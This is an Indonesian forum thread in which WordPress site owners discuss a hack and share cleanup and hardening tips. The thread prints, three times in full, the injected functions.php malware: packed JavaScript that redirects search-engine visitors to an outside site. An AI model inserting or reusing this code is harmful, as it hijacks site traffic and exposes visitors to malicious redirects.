Yang ini HACK nya parah banget, ADUHHH!!

PHP:

<?php 
add_action('get_footer', 'add_sscounter');
    function add_sscounter(){
        echo '<!--scounter-->';
        if(function_exists('is_user_logged_in')){
            if(time()%2 == 0 && !is_user_logged_in()){            
                echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
            }
        }
    }
?>


benar gan, ane cek di file functions.php nemu skrip di atas, ane delete hilang dah,, ada yg ngerti code nya ga ya?

 

alhamdulillah
terharu ane
barusan mau tanya
ternyata udah ada yg bisa atasi Hiks

Thanks gan

eh cara ilanginnya gmn ya ?

aseeeeek ketemu di function


btw cara masuknya gimana ya tu hacker
trus skrg cara nutupnya gimana ya biar ga kena lagi ?
ada masukan

 

ini keknya script trojan gan. ane dulu pernah ngalamin yang kek gini. ampe hosting ane runtuh semua.

 

kalo kita pake antivirus avast, emang terdetek sbg virus/trojan js:Redirector-MR [Trj]

 

Klo bleh tau apa pake shared host? soalnya kdng tuh hacker masuk lwt blog ente yg lain, kdgn yg tdk trurus, krn dr situ dia bisa liat struktur folder hostingan, ntar psti yg ditarget situs2 dgn trafik bgs, btw udh ditambahi ginian di htaccess?

PHP:

# DISABLE DIRECTORY BROWSING
Options All -Indexes

# PREVENT FOLDER LISTING
IndexIgnore *

sry newbie kl slah, msh bljr

 

iya ane pake hostgator dan hawkhost, keduanya kena,

btw itu htacess ditaruh di folder sebelah mana?
trus itu fungsinya buat apa? ane kagak mudeng yg ginian

 

Satu folder dgn hasil install an wp gan, nd coba cek di hxxp://perishablepress.com ttg security wp via hatccess, ane biasanya baca2 disitu

 

waw modif htaccess ya
ane praktekin dulu gan
thanks sarannya

 

cek plugin2 nya gan sapa tau ada bug..

 

wah ternyata bisa ke hajar lagi
ini muncul dari mana ya
padahal kemaren baru di ganti : |

trus muncul kode gituan lagi

ada yang tau mmunculnya darimana ?

 

Munculnya darimana blom diketahui sob,
tapi sementara ini setelah edit function.php, permissionnya ane ganti ke 444

 

Code:

[COLOR=#333333][I]<?php [/I][/COLOR]
[COLOR=#333333][I]add_action('get_footer', 'add_sscounter');[/I][/COLOR]
[COLOR=#333333][I]function add_sscounter(){[/I][/COLOR]
[COLOR=#333333][I]echo '<!--scounter-->';[/I][/COLOR]
[COLOR=#333333][I]if(function_exists('is_user_logged_in')){[/I][/COLOR]
[COLOR=#333333][I]if(time()%2 == 0 && !is_user_logged_in()){	[/I][/COLOR]
[COLOR=#333333][I]echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r) {e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStr ing(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i \"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referr er|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|m s|google|substring|split||||||ea|ht|tp|document||| go|window|location'.split('|'),0,{}))</script>";[/I][/COLOR]
[COLOR=#333333][I]}[/I][/COLOR]
[COLOR=#333333][I]}[/I][/COLOR]
[COLOR=#333333][I]}[/I][/COLOR]
[COLOR=#333333][I]?>[/I][/COLOR]

kode yang ini pa sudah di hapus gan ??
nih harap di hapus aja, karena codenya aja sudah di di encode..
nih shell jalan belakang sih hacker..

 

biar ga berubah2 diganti ke 444 ya
oke deh gan thanks infonya

 

wah blog aq jg kena hack nih tp untung dah bisa di atasi tp visitor jd anjlok bener gara2 di hack sehari cuma 2 visit. parah'a tuh situs bahasa arab tentang sekolah perang.

 

PHP:

if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){    
echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r) {e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStr ing(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i \"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referr er|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|m s|google|substring|split||||||ea|ht|tp|document||| go|window|location'.split('|'),0,{}))</script>";
}
}
}

keknya yg itu wajib di hapus gan

 

Syukur banget, ane belum pernah sampe di crack orang blog ane. blog sepi sih

 

Semoga Cepet kelar Bang. Waduh ngeri bener tuh...

 

dulu pernah lihat kayak gini.. cerdas banget. yg punya blog ga sadar udah kena, karena yg punya blog aksesnya lgsg.

biasanya ane cek lewat FTP, file terakhir yg di ubah apa.. cek aj biasanya file itu udah di inject

 

Sama Mas Bro, saya juga di hack, keyword yg di serp redirect ke googosearch.biz di pop up sama iklan dia

 

apa bisa pake plugin untuk protect semacam ini dari hacker...? serem juga jadinya...